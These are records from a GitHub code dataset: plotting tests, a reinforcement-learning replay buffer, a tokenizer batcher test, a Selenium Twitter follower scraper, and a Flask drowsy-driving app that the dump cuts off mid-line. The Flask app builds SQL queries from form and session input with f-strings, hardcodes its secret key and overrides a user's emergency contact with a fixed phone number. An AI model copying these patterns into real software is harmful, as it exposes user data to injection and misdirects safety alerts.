"file_size_in_byte": 399, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "enum.Enum", "line_number": 7, "usage_type": "name"}, {"api_name": "pydantic.BaseSettings", "line_number": 14, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 15, "usage_type": "call"}, {"api_name": "shared.config.cors.CORSSettings", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "91875639", "text": "from figures.myfigure import MyFigure\nfrom figures.utils import get_data_dir\nimport matplotlib.pyplot as plt\n\nimport numpy as np\nimport os\nimport pytest\n\nclass TestVectorField:\n '''\n '''\n @pytest.fixture\n def dir_path(self):\n ''' returns dir path for the test plots\n '''\n dir_path = os.path.join(get_data_dir(), 'vector_field')\n return dir_path\n\n @pytest.fixture\n # https://matplotlib.org/stable/gallery/images_contours_and_fields/\n # quiver_simple_demo.html#sphx-glr-gallery-images-contours-and-fields-quiver-simple-demo-py\n def setting_1(self):\n ''' returns tuple (X, Y)\n '''\n x = y = np.arange(0, 2 * np.pi, .2)\n X, Y = np.meshgrid(x, y, indexing='ij')\n U = np.cos(X)\n V = np.sin(Y)\n return X, Y, U, V\n\n #@pytest.mark.skip(reason='')\n def test_quiver(self, dir_path, setting_1):\n '''\n '''\n fig = plt.figure(\n FigureClass=MyFigure,\n dir_path=dir_path,\n file_name='quiver',\n )\n X, Y, U, V = setting_1\n fig.vector_field(X, Y, U, V)\n\n def test_quiver_limits(self, dir_path, setting_1):\n '''\n '''\n fig = plt.figure(\n FigureClass=MyFigure,\n dir_path=dir_path,\n file_name='quiver_limits',\n )\n X, Y, U, V = setting_1\n fig.set_xlim(0, 3)\n fig.set_ylim(0, 3)\n fig.vector_field(X, Y, U, V)\n\n def test_quiver_scale(self, dir_path, setting_1):\n '''\n '''\n fig = plt.figure(\n FigureClass=MyFigure,\n dir_path=dir_path,\n file_name='quiver_scale',\n )\n X, Y, U, V = setting_1\n\n # a smaller scale parameter makes the arrow longer\n fig.vector_field(X, Y, U, V, scale=10)\n\n def test_quiver_width(self, dir_path, setting_1):\n '''\n '''\n fig = plt.figure(\n FigureClass=MyFigure,\n dir_path=dir_path,\n file_name='quiver_width',\n )\n X, Y, U, V = setting_1\n\n # a smaller scale parameter makes the arrow longer\n fig.vector_field(X, Y, U, V, width=0.01)\n", "repo_name": "riberaborrell/pyplot-my-figure", "sub_path": "tests/test_vector_field.py", "file_name": "test_vector_field.py", "file_ext": "py", "file_size_in_byte": 2170, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "figures.utils.get_data_dir", "line_number": 16, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 12, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.meshgrid", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 28, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 19, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "figures.myfigure.MyFigure", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "figures.myfigure.MyFigure", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "figures.myfigure.MyFigure", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "figures.myfigure.MyFigure", "line_number": 73, "usage_type": "name"}]} +{"seq_id": "75326361124", "text": "from os import terminal_size\nfrom typing import Union\nfrom typing import Iterable, Optional\nimport jax \n\nimport gym\nimport gym.spaces\nimport numpy as np\n\nimport copy\n\nfrom jaxrl2.data.dataset import Dataset, DatasetDict\nimport collections\nfrom flax.core import frozen_dict\n\ndef _init_replay_dict(obs_space: gym.Space,\n capacity: int) -> Union[np.ndarray, DatasetDict]:\n if isinstance(obs_space, gym.spaces.Box):\n return np.empty((capacity, *obs_space.shape), dtype=obs_space.dtype)\n elif isinstance(obs_space, gym.spaces.Dict):\n data_dict = {}\n for k, v in obs_space.spaces.items():\n data_dict[k] = _init_replay_dict(v, capacity)\n return data_dict\n else:\n raise TypeError()\n\n\n\nclass NaiveReplayBuffer(Dataset):\n \n def __init__(self, observation_space: gym.Space, action_space: gym.Space, capacity: int):\n self.observation_space = observation_space\n self.action_space = action_space\n self.capacity = capacity\n\n observations = _init_replay_dict(self.observation_space, self.capacity)\n next_observations = _init_replay_dict(self.observation_space, self.capacity)\n actions = np.empty((self.capacity, *self.action_space.shape), dtype=self.action_space.dtype)\n next_actions = np.empty((self.capacity, *self.action_space.shape), dtype=self.action_space.dtype)\n rewards = np.empty((self.capacity, ), dtype=np.float32)\n mc_return = np.empty((self.capacity, ), dtype=np.float32)\n masks = np.empty((self.capacity, ), dtype=np.float32)\n trajectory_id = np.empty((self.capacity,), dtype=np.float32)\n dones = np.empty((self.capacity,), dtype=np.float32)\n\n self.data = {\n 'observations': observations,\n 'next_observations': next_observations,\n 'actions': actions,\n 'next_actions': next_actions,\n 'rewards': rewards,\n 'masks': masks,\n 'trajectory_id': trajectory_id,\n 'dones': dones,\n }\n\n self.size = 0\n self._traj_counter = 0\n self._start = 0\n self.traj_bounds = dict()\n\n def increment_traj_counter(self):\n self.traj_bounds[self._traj_counter] = (self._start, self.size) # [start, end)\n self._start = self.size\n self._traj_counter += 1\n\n def get_random_trajs(self, num_trajs: int):\n self.which_trajs = np.random.randint(0, self._traj_counter-1, num_trajs)\n observations_list = []\n next_observations_list = []\n mc_rewards_list = []\n actions_list = []\n rewards_list = []\n terminals_list = []\n masks_list = []\n\n for i in self.which_trajs:\n start, end = self.traj_bounds[i]\n \n # handle this as a dictionary\n obs_dict_curr_traj = dict()\n for k in self.data['observations']:\n obs_dict_curr_traj[k] = self.data['observations'][k][start:end]\n observations_list.append(obs_dict_curr_traj)\n \n next_obs_dict_curr_traj = dict()\n for k in self.data['next_observations']:\n next_obs_dict_curr_traj[k] = self.data['next_observations'][k][start:end] \n next_observations_list.append(next_obs_dict_curr_traj)\n \n actions_list.append(self.data['actions'][start:end])\n rewards_list.append(self.data['rewards'][start:end])\n terminals_list.append(1-self.data['masks'][start:end])\n masks_list.append(self.data['masks'][start:end])\n \n batch = {\n 'observations': observations_list,\n 'next_observations': next_observations_list,\n 'actions': actions_list,\n 'rewards': rewards_list,\n 'terminals': terminals_list,\n 'masks': masks_list\n }\n return batch\n \n def insert(self, data_dict: DatasetDict):\n if self.size == self.capacity:\n # Double the capacity\n observations = _init_replay_dict(self.observation_space, self.capacity)\n next_observations = _init_replay_dict(self.observation_space, self.capacity)\n actions = np.empty((self.capacity, *self.action_space.shape), dtype=self.action_space.dtype)\n next_actions = np.empty((self.capacity, *self.action_space.shape), dtype=self.action_space.dtype)\n rewards = np.empty((self.capacity, ), dtype=np.float32)\n masks = np.empty((self.capacity, ), dtype=np.float32)\n\n data_new = {\n 'observations': observations,\n 'next_observations': next_observations,\n 'actions': actions,\n 'next_actions': next_actions,\n 'rewards': rewards,\n 'masks': masks,\n }\n\n for x in self.data:\n if isinstance(self.data[x], np.ndarray):\n self.data[x] = np.concatenate((self.data[x], data_new[x]), axis=0)\n elif isinstance(self.data[x], dict):\n for y in self.data[x]:\n self.data[x][y] = np.concatenate((self.data[x][y], data_new[x][y]), axis=0)\n else:\n raise TypeError()\n self.capacity *= 2\n\n\n for x in data_dict:\n if x in self.data:\n if isinstance(data_dict[x], dict):\n for y in data_dict[x]:\n self.data[x][y][self.size] = data_dict[x][y]\n else: \n self.data[x][self.size] = data_dict[x]\n self.size += 1\n \n def compute_action_stats(self):\n actions = self.data['actions']\n return {'mean': actions.mean(axis=0), 'std': actions.std(axis=0)}\n\n def normalize_actions(self, action_stats):\n # do not normalize gripper dimension (last dimension)\n copy.deepcopy(action_stats)\n action_stats['mean'][-1] = 0\n action_stats['std'][-1] = 1\n self.data['actions'] = (self.data['actions'] - action_stats['mean']) / action_stats['std']\n self.data['next_actions'] = (self.data['next_actions'] - action_stats['mean']) / action_stats['std']\n\n def sample(self, batch_size: int, keys: Optional[Iterable[str]] = None, indx: Optional[np.ndarray] = None) -> frozen_dict.FrozenDict:\n indices = np.random.randint(0, self.size, batch_size)\n data_dict = {}\n for x in self.data:\n if isinstance(self.data[x], np.ndarray):\n data_dict[x] = self.data[x][indices]\n elif isinstance(self.data[x], dict):\n data_dict[x] = {}\n for y in self.data[x]:\n data_dict[x][y] = self.data[x][y][indices]\n else:\n raise TypeError()\n \n return frozen_dict.freeze(data_dict)\n\n def get_iterator(self, batch_size: int, keys: Optional[Iterable[str]] = None, indx: Optional[np.ndarray] = None, queue_size: int = 2):\n # See https://flax.readthedocs.io/en/latest/_modules/flax/jax_utils.html#prefetch_to_device\n # queue_size = 2 should be ok for one GPU.\n\n queue = collections.deque()\n\n def enqueue(n):\n for _ in range(n):\n data = self.sample(batch_size, keys, indx)\n queue.append(jax.device_put(data))\n\n enqueue(queue_size)\n while queue:\n yield queue.popleft()\n enqueue(1)\n\n\n \nclass NaiveReplayBufferParallel(NaiveReplayBuffer):\n \"\"\"\n Implements naive buffer with parallelism\n \"\"\"\n def __init__(self, observation_space: gym.Space, action_space: gym.Space,\n capacity: int, num_devices=len(jax.devices())):\n self.num_devices = num_devices\n super().__init__(observation_space=observation_space,\n action_space=action_space,\n capacity=capacity)\n \n def get_iterator(self,\n batch_size: int,\n keys: Optional[Iterable[str]] = None,\n indx: Optional[np.ndarray] = None,\n queue_size: int = 2):\n # See https://flax.readthedocs.io/en/latest/_modules/flax/jax_utils.html#prefetch_to_device\n # queue_size = 2 should be ok for one GPU.\n\n queue = collections.deque()\n\n def enqueue(n):\n assert batch_size % self.num_devices == 0\n effective_batch_size = batch_size // self.num_devices\n for _ in range(n):\n data = [self.sample(effective_batch_size, keys, indx) for _ in range(self.num_devices)] \n queue.append(jax.device_put_sharded(data, jax.devices()))\n\n enqueue(queue_size)\n while queue:\n yield queue.popleft()\n enqueue(1)\n", "repo_name": "Asap7772/PTR", "sub_path": "jaxrl2/data/naive_replay_buffer.py", "file_name": "naive_replay_buffer.py", "file_ext": "py", "file_size_in_byte": 8825, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 25, "dataset": "github-code", "pt": "52", "api": [{"api_name": "gym.Space", "line_number": 16, "usage_type": "attribute"}, {"api_name": "gym.spaces", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 19, "usage_type": "call"}, {"api_name": "gym.spaces", "line_number": 20, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 17, "usage_type": "attribute"}, {"api_name": "jaxrl2.data.dataset.DatasetDict", "line_number": 17, "usage_type": "name"}, {"api_name": "jaxrl2.data.dataset.Dataset", "line_number": 30, "usage_type": "name"}, {"api_name": "gym.Space", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 41, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 43, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 69, "usage_type": "attribute"}, {"api_name": "jaxrl2.data.dataset.DatasetDict", "line_number": 107, "usage_type": "name"}, {"api_name": "numpy.empty", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 114, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 115, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 127, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 131, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 152, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 158, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 158, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 158, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 159, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 162, "usage_type": "attribute"}, {"api_name": "flax.core.frozen_dict.freeze", "line_number": 171, "usage_type": "call"}, {"api_name": "flax.core.frozen_dict", "line_number": 171, "usage_type": "name"}, {"api_name": "flax.core.frozen_dict.FrozenDict", "line_number": 158, "usage_type": "attribute"}, {"api_name": "flax.core.frozen_dict", "line_number": 158, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 173, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 173, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 173, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 177, "usage_type": "call"}, {"api_name": "jax.device_put", "line_number": 182, "usage_type": "call"}, {"api_name": "gym.Space", "line_number": 195, "usage_type": "attribute"}, {"api_name": "jax.devices", "line_number": 196, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 204, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 204, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 205, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 205, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 210, "usage_type": "call"}, {"api_name": "jax.device_put_sharded", "line_number": 217, "usage_type": "call"}, {"api_name": "jax.devices", "line_number": 217, "usage_type": "call"}]} +{"seq_id": "42832223085", "text": "from copy import copy\nfrom pathlib import Path\nfrom tempfile import NamedTemporaryFile\n\nimport pytest\nimport tiktoken\nfrom tiktoken import Encoding\n\nfrom nxontology_ml.gpt_tagger import TaskConfig\nfrom nxontology_ml.gpt_tagger._openai_models import _4K\nfrom nxontology_ml.gpt_tagger._tiktoken_batcher import _TiktokenBatcher\nfrom nxontology_ml.tests.utils import get_test_resource_path\n\n\n@pytest.fixture\ndef tiktoken_cl100k_encoding() -> Encoding:\n return tiktoken.get_encoding(\"cl100k_base\")\n\n\ndef test_add_tokens(tiktoken_cl100k_encoding: Encoding) -> None:\n record = \"record\"\n record_len = len(tiktoken_cl100k_encoding.encode(record))\n\n batcher = _TiktokenBatcher(\n max_token_cnt=2 * record_len, tiktoken_encoding=tiktoken_cl100k_encoding\n )\n assert batcher._record_buffer == []\n assert batcher._buffer_token_cnt == 0\n\n ret = batcher.add_record_to_buffer(record)\n assert ret is None\n assert batcher._record_buffer == [record]\n assert batcher._buffer_token_cnt == record_len\n\n ret = batcher.add_record_to_buffer(record)\n assert ret is None\n assert batcher._record_buffer == [record, record]\n assert batcher._buffer_token_cnt == 2 * record_len\n\n ret = batcher.add_record_to_buffer(record)\n assert ret == [record, record]\n assert batcher._record_buffer == [record]\n assert batcher._buffer_token_cnt == record_len\n\n ret = batcher.flush_buffer()\n assert ret == [record]\n assert batcher._record_buffer == []\n assert batcher._buffer_token_cnt == 0\n\n # Error triggered by internal tempering\n batcher._do_add_record_to_buffer(record)\n batcher._do_add_record_to_buffer(record)\n with pytest.raises(ValueError, match=\"Buffer size exceeded\"):\n batcher._do_add_record_to_buffer(record)\n\n\ndef test_from_config(\n tiktoken_cl100k_encoding: Encoding, precision_config: TaskConfig\n) -> None:\n # Valid config\n batcher = _TiktokenBatcher.from_config(precision_config)\n assert batcher._tiktoken_encoding == tiktoken_cl100k_encoding\n\n prompt = get_test_resource_path(\"precision_v1.txt\")\n prompt_tokens = len(tiktoken_cl100k_encoding.encode(prompt.read_text()))\n assert prompt_tokens > 0\n assert (\n batcher._max_token_cnt\n == int(_4K * precision_config.prompt_token_ratio) - prompt_tokens\n )\n\n # Prompt too long\n invalid_test_config = copy(precision_config)\n with NamedTemporaryFile() as tmpfile:\n # Mk faulty prompt content\n prompt_path = Path(tmpfile.name)\n # Uncommon symbol has >= 1 token per char\n prompt_content = \"Ⓡ\" * (_4K + 1)\n assert len(tiktoken_cl100k_encoding.encode(prompt_content)) >= _4K + 1\n prompt_path.write_text(prompt_content)\n\n invalid_test_config.prompt_path = prompt_path\n with pytest.raises(\n ValueError,\n match=\"The provided prompt has more tokens than the window of the model.\",\n ):\n _TiktokenBatcher.from_config(invalid_test_config)\n", "repo_name": "related-sciences/nxontology-ml", "sub_path": "nxontology_ml/gpt_tagger/tests/_tiktoken_batcher_test.py", "file_name": "_tiktoken_batcher_test.py", "file_ext": "py", "file_size_in_byte": 2983, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tiktoken.get_encoding", "line_number": 17, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 15, "usage_type": "attribute"}, {"api_name": "tiktoken.Encoding", "line_number": 16, "usage_type": "name"}, {"api_name": "tiktoken.Encoding", "line_number": 20, "usage_type": "name"}, {"api_name": "nxontology_ml.gpt_tagger._tiktoken_batcher._TiktokenBatcher", "line_number": 24, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 53, "usage_type": "call"}, {"api_name": "tiktoken.Encoding", "line_number": 58, "usage_type": "name"}, {"api_name": "nxontology_ml.gpt_tagger.TaskConfig", "line_number": 58, "usage_type": "name"}, {"api_name": "nxontology_ml.gpt_tagger._tiktoken_batcher._TiktokenBatcher.from_config", "line_number": 61, "usage_type": "call"}, {"api_name": "nxontology_ml.gpt_tagger._tiktoken_batcher._TiktokenBatcher", "line_number": 61, "usage_type": "name"}, {"api_name": "nxontology_ml.tests.utils.get_test_resource_path", "line_number": 64, "usage_type": "call"}, {"api_name": "nxontology_ml.gpt_tagger._openai_models._4K", "line_number": 69, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 73, "usage_type": "call"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 74, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 76, "usage_type": "call"}, {"api_name": "nxontology_ml.gpt_tagger._openai_models._4K", "line_number": 78, "usage_type": "name"}, {"api_name": "nxontology_ml.gpt_tagger._openai_models._4K", "line_number": 79, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 83, "usage_type": "call"}, {"api_name": "nxontology_ml.gpt_tagger._tiktoken_batcher._TiktokenBatcher.from_config", "line_number": 87, "usage_type": "call"}, {"api_name": "nxontology_ml.gpt_tagger._tiktoken_batcher._TiktokenBatcher", "line_number": 87, "usage_type": "name"}]} +{"seq_id": "72388901924", "text": "from selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import SessionNotCreatedException\nimport selenium\nimport time\n\noptions = Options()\noptions.add_argument(f\"--user-data-dir=C:/Users/<username>/AppData/Local/Google/Chrome/User Data/profiledata\")\noptions.add_argument(f\"--profile-directory=Profile 2\")\nservice = Service(ChromeDriverManager().install())\ndriver = webdriver.Chrome(service=service, options=options)\n\ndef get_followers(screen_name):\n \"\"\"\n get_followers(screen_name)\n return follower_list\n Failed -> False\n \"\"\"\n try:\n driver.get(f\"https://twitter.com/{screen_name}/followers\")\n driver.implicitly_wait(1)\n follower_list = []\n # Code to goto End of the Page\n last_height = driver.execute_script(\"return document.body.scrollHeight\")\n while True:\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(1)\n new_height = driver.execute_script(\"return document.body.scrollHeight\")\n if new_height == last_height:\n break\n last_height = new_height\n\n usernames = driver.find_elements(By.CLASS_NAME,value=\"css-4rbku5.css-18t94o4.css-1dbjc4n.r-1loqt21.r-1wbh5a2.r-dnmrzs.r-1ny4l3l\")\n for list in usernames:\n follower_list.append(list.get_attribute(\"href\"))\n return follower_list\n except Exception:\n return False", "repo_name": "yuu996/twinium", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 1706, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 11, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.service.Service", "line_number": 14, "usage_type": "call"}, {"api_name": "webdriver_manager.chrome.ChromeDriverManager", "line_number": 14, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 15, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 15, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 31, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 37, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "27478854407", "text": "from flask import Flask, request, render_template, url_for, redirect, session\nimport yaml\nimport psycopg2\nfrom auth import start_verify, check_verify\nfrom PIL import Image\nimport base64\nimport io\nfrom flask import Response as FlaskResponse\nfrom flask import jsonify\nimport json\nfrom dump_table import dump_rows as dr\nimport numpy as np\nimport cv2\nfrom tensorflow import keras\nfrom send_msg import send_message\nfrom decimal import *\n\n\ncreds = yaml.safe_load(open(\"creds.yaml\", \"r\"))\n\napp = Flask(__name__)\n\napp.secret_key = 'A0Zr98j/3yX R~XHH!jmN]LWX/,?RT' #needed to use sessions\n\n\nconn = psycopg2.connect(creds[\"DATABASE_URL\"])\n\n\n@app.route('/')\ndef test():\n return render_template('index.html')\n\n@app.route('/sign_in', methods=['GET', 'POST'])\ndef sign_in():\n print('got a request')\n if request.method == 'GET':\n x = 1\n else:\n # Do stuff here\n print('in here')\n\n # try:\n # ret = request.get_json()\n # except:\n # print('could not get json')\n # return render_template('index.html')\n # print('got here')\n # if ret == None:\n # return render_template('index.html')\n\n # number = ret['number']\n\n number = request.values.get('phone')\n print(f'request: {request}')\n print(f'request form: {request.form}')\n print(f'request.values: {request.values}')\n print(number)\n\n if not verify_phone(number):\n print('could not verify number')\n return False\n\n # session['number'] = number\n # print(f'set the session number, {session[\"number\"]}')\n status = start_verify(number)\n print(f'status: {status}')\n\n #for a test try to insert number into sql table\n return True\n\n\n # Check to see if the number is in the data base\n # docs = users.where(u'number', u'==', '5').stream()\n # print(number)\n\n # size = 0\n # for doc in docs:\n # if size > 0:\n # print('something is wrong')\n # else:\n # size += 1\n # # maybe unpack some things about the user\n\n\n # need to verify number either way\ndef getOldTime(number):\n with conn.cursor() as c:\n #get the old amount of time driven\n table_name = 'LEADERBOARD'\n c.execute(f'SELECT time FROM {table_name} WHERE number=\\'{number}\\';')\n time = c.fetchall()\n # print(user)\n conn.commit()\n oldTime = float(time[0][0])\n return oldTime\n\ndef updateLeaderboard(hoursDriven, oldTime, number):\n # number = str(session['number'])\n updatedHours = hoursDriven + oldTime\n with conn.cursor() as c:\n table_name = 'LEADERBOARD'\n c.execute(f'UPDATE {table_name} SET time = \\'{updatedHours}\\'WHERE number=\\'{number}\\';')\n c.execute(f'UPDATE {table_name} SET numdrives = numdrives + 1 WHERE number=\\'{number}\\';')\n # c.execute(f'UPDATE {table_name} SET numdrives = \\'{updatedHours}\\'WHERE number=\\'{number}\\';')\n # time = c.fetchall()\n # print(user)\n conn.commit()\n with conn.cursor() as c:\n table_name = 'LEADERBOARD'\n #THIS DOESNT WORK BECAUSE TIME IS A VARCHAR AND NOT AN INT/DOUBLE\n c.execute(f'SELECT COUNT(name) FROM {table_name} WHERE number!=\\'{number}\\' AND time > \\'{updatedHours}\\';')\n result = c.fetchall()\n # print(user)\n conn.commit()\n print(result)\n above = result[0][0]\n hoursDriven /= 60000\n toSend = f'You added {hoursDriven} seconds of safe driving. There are now {above} people ahead of you on the leaderboard! Keep it up!'\n send_message(toSend, number)\n\ndef send_warning(num):\n print('sending warning for')\n with conn.cursor() as c:\n table_name = 'USERS'\n num = num.strip()\n sql = f'''SELECT name, econ1 FROM {table_name} WHERE number='{num}';'''\n print(sql)\n c.execute(sql)\n # c.execute(f'UPDATE {table_name} SET numdrives = numdrives + 1 WHERE number=\\'{number}\\';')\n # c.execute(f'UPDATE {table_name} SET numdrives = \\'{updatedHours}\\'WHERE number=\\'{number}\\';')\n res = c.fetchall()\n print(res)\n # print(user)\n conn.commit()\n name = res[0][0]\n econ1 = res[0][1]\n print(f'name: {name}, econ1: {econ1}')\n econ1='4845385080'\n\n to_send = f'We have detected that {name} is potentially driving drowsy, you may want to contact them to make sure that they are not making bad decisions'\n send_message(to_send, econ1)\n \n\n@app.route('/end_drive', methods = [\"POST\"])\ndef end():\n number = str(session['number'])\n print('ending the drive')\n # number = \"7817388373\"\n hoursDriven = request.json['hoursDriven']\n print(f'ending drive for: {number}, with hoursDriven: {hoursDriven}')\n # badTime = request.json['hoursDriven']\n oldTime = getOldTime(number)\n #update leaderboard\n updateLeaderboard(hoursDriven, oldTime, number)\n\n@app.route('/landing', methods = [\"GET\"])\ndef landing():\n table_name = 'USERS'\n number = str(session['number'])\n with conn.cursor() as c:\n c.execute(f'SELECT * FROM {table_name} WHERE number=\\'{number}\\';')\n user = c.fetchall()\n # print(user)\n conn.commit()\n name = user[0][1]\n return render_template('landing.html',name=name)\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n if request.method == 'GET':\n print(f'here, {session[\"number\"]}')\n return render_template('register.html')\n else:\n # print(f'getting request: {request}')\n # print(f'request form: {request.form}')\n print(\"Request Received!\")\n print(\"Username: \" + request.form['name'])\n print(\"School: \"+ request.form['school'])\n print(\"Emergency Contact1: \" + request.form['contact1'])\n uname = request.form['name']\n school = request.form['school']\n econ1 = request.form['contact1']\n number = session['number']\n with conn.cursor() as cur:\n # number='9788065553'\n # sql = f'''SELECT * FROM USERS WHERE number = '5';'''\n query = 'INSERT INTO Users (number, name, school, econ1) VALUES (\\'{}\\', \\'{}\\', \\'{}\\', \\'{}\\');'.format(number, uname, school, econ1)\n cur.execute(query)\n conn.commit()\n return None\n\ndetector = cv2.FaceDetectorYN.create(\n 'face_detection_yunet_2022mar.onnx',\n \"\",\n (640, 480),\n 0.9, # score threshold\n 0.3, # nms threshold\n 5000 # top k\n)\neyesModel = keras.models.load_model('eyesOpenClose.h5')\nyawnModel = keras.models.load_model('yawn.h5')\n@app.route('/live', methods=['POST'])\ndef live():\n #take in the image and compare it to the model\n \n print(f'request: {request}')\n # print(f'request form: {request.form}')\n # print(f'request.values: {request.values}')\n # print(f'request json: {request.get_json()}' )\n # print(f'{request.json[\"imageSrc\"]}')\n # with open('test.json', 'w') as f:\n # f.write(request.json['imageSrc'])\n\n # ret = json.load(request.json)\n # print(f'ret: {ret}')\n # print(f'{type(request.json[\"imageSrc\"])}')\n b = (request.json['imageSrc'])\n z = b[b.find('/9'):]\n nparr = np.fromstring(base64.b64decode(z), np.uint8)\n frame = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n frame = cv2.flip(frame, 1) # if your camera reverses your image\n faces = detector.detect(frame)[1]\n \n if faces is not None:\n face_boxes = []\n for face in faces:\n x,y,w,h = face[:4].astype('int')\n face_boxes.append([x,y,x+w,y+h])\n \n lx,ly,la,lb = sorted([[x,y,a,b,(a-x)*(b-y)] for x,y,a,b in face_boxes], key=lambda x: x[4])[-1][:-1]\n face_array = frame[max(0,ly):min(lb,frame.shape[0]), max(0,lx):min(la,frame.shape[1])]\n face_array = cv2.resize(face_array, (100,100)).reshape(-1, 100, 100, 3)\n\n yawn_pred = yawnModel.predict(face_array/255, verbose=0).item()\n yawn_text = \"Mouth: Open\" if yawn_pred < 0.2 else \"Mouth: Closed\"\n cv2.putText(frame, yawn_text, (frame.shape[1]-250,frame.shape[0]-50), cv2.FONT_HERSHEY_SIMPLEX, 1, (50, 203, 241), 2)\n\n eyes_pred = eyesModel.predict(face_array/255, verbose=0).item()\n eyes_text = \"Eyes: Closed\" if eyes_pred < 0.50 else \"Eyes: Open\"\n cv2.putText(frame, eyes_text, (25,frame.shape[0]-50), cv2.FONT_HERSHEY_SIMPLEX, 1, (50, 203, 241), 2)\n\n frame = cv2.rectangle(frame, (lx, ly), (la, lb), (0, 255, 0), 2)\n \n\n retval, buffer = cv2.imencode('.jpg', frame)\n\n # z = 